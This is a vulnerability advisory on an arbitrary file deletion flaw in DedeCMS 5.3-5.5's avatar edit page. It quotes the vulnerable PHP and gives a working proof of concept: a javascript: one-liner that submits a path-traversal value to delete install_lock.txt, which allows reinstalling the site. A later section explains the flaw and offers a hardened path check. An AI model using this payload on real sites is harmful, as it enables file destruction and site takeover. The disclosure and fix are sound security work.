dedecms 5.3 to 5.5 arbitrary file deletion 0day - vulnerability warning - the black bar safety net

ID MYHACK58:62201025801
Type myhack58
Reporter Anonymous
Modified 2010-01-02T00:00:00


Author: My5t3ry. This minor exploit was first posted on the old General Forum; it is now being published online as well. The vulnerability is in /member/edit_face.php, lines 12-47. A few other files have the same problem, but I forget which ones. The code is as follows:

if($dopost=='save')
{
    // Only paths under the current member's own upload directory should be accepted as the old avatar
    $userdir = $cfg_user_dir.'/'.$cfg_ml->M_ID;
    // Prefix-only check: the path is never canonicalised, so "../" sequences after the prefix still pass
    if(!ereg('^'.$userdir, $oldface))
    {
        $oldface = '';
    }
    if(is_uploaded_file($face))
    {
        if($faceurl != '')
        {
            if( (ereg(':', $faceurl) && !eregi('^http:', $faceurl)) || !eregi("\.(jpg|png|gif)", $faceurl) )
            {
                ShowMsg("There is a problem with the image URL you specified!", "-1");
                exit();
            }
        }

        // Delete the old picture in case the extension differs (e.g. the original was a gif and the new one is jpg)
        // $oldface is user-controlled, so this unlink() is where the arbitrary deletion happens
        if($oldface != '' && file_exists($cfg_basedir.$oldface))
        {
            @unlink($cfg_basedir.$oldface);
        }

        // Upload the new image
        $face = MemberUploads('face', $faceurl, $cfg_ml->M_ID, 'image', 'myface', 180, 180);
    }
    else
    {
        $face = $oldface;
    }
    $query = "update #@__member set face = '$face' where mid='{$cfg_ml->M_ID}' ";
    $dsql->ExecuteNoneQuery($query);
    ShowMsg('Avatar updated successfully!', $backurl);
    exit();
}

PoC usage: under "Set personal data", upload a picture as the "user avatar". After the upload, view the page source and search for oldface to find its value; here it is /uploads/userup/2/myface.png. Then go back to the upload form, select the image you just uploaded, but do not click upload. Change /uploads/userup/2/myface.png to the relative path of the file to delete, e.g. /dedecms/uploads/userup/2/../../../install/install_lock.txt

javascript:document.form1.oldface.value='/uploads/userup/2/../../../install/install_lock.txt';document.form1.submit();

PS: on 5.3, deleting this file allows the site to be reinstalled; on 5.5 it can only be used to delete files indiscriminately.
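The root cause in both the code excerpt and the PoC above is that the oldface check is a bare regex prefix match: "/uploads/userup/2/../../../install/install_lock.txt" starts with the user directory, so it passes, and unlink() then resolves the "../" segments. The following is an added example, not DedeCMS code and not part of the original advisory; the function names (checkOldFaceVulnerable, normalisePath, checkOldFaceHardened) and the sample paths are assumptions made for this illustration. It places the original prefix logic beside a check that lexically canonicalises the path before comparing, so traversal and a neighbouring user's directory are both rejected without needing the target file to exist.

```php
<?php
// Added example (not DedeCMS code): why the prefix check in edit_face.php is
// insufficient, and a canonicalising check that rejects traversal.
// Function names and sample paths below are assumptions for this illustration.

// Mirrors the original logic: a plain regex prefix match on the user directory.
// preg_match stands in for the removed ereg(); the semantics are the same here.
function checkOldFaceVulnerable(string $userdir, string $oldface): bool
{
    return preg_match('#^' . preg_quote($userdir, '#') . '#', $oldface) === 1;
}

// Lexically normalises a path ("a/b/../c" -> "/a/c") without touching the
// filesystem, so it also works when the referenced file does not exist.
function normalisePath(string $path): string
{
    $parts = [];
    foreach (explode('/', str_replace('\\', '/', $path)) as $seg) {
        if ($seg === '' || $seg === '.') {
            continue;
        }
        if ($seg === '..') {
            array_pop($parts);          // climb one level, never above root
            continue;
        }
        $parts[] = $seg;
    }
    return '/' . implode('/', $parts);
}

// Hardened check: after normalisation the path must still sit inside the
// member's own avatar directory (trailing slash included, so "2" does not
// match "22") and must end in an allowed image extension.
function checkOldFaceHardened(string $userdir, string $oldface): bool
{
    $base = rtrim(normalisePath($userdir), '/') . '/';
    $norm = normalisePath($oldface);
    if (strncmp($norm, $base, strlen($base)) !== 0) {
        return false;                   // escaped the user directory
    }
    return preg_match('/\.(jpg|png|gif)$/i', $norm) === 1;
}

// Constructed sample inputs, modelled on the values quoted in the advisory.
$userdir = '/uploads/userup/2';
$samples = [
    '/uploads/userup/2/myface.png',                        // legitimate avatar
    '/uploads/userup/2/../../../install/install_lock.txt', // traversal from the PoC
    '/uploads/userup/22/myface.png',                       // another member's directory
];

foreach ($samples as $s) {
    printf("%-55s vulnerable=%s hardened=%s\n", $s,
        checkOldFaceVulnerable($userdir, $s) ? 'pass' : 'reject',
        checkOldFaceHardened($userdir, $s)   ? 'pass' : 'reject');
}
```

Run with the PHP CLI: the legitimate path passes both checks, while the traversal path and the neighbouring-user path pass the prefix check but are rejected by the hardened one. In a real fix the avatar path should not be taken from the form at all; reading it back from the member record (the same value the update query writes) removes the user-controlled input entirely.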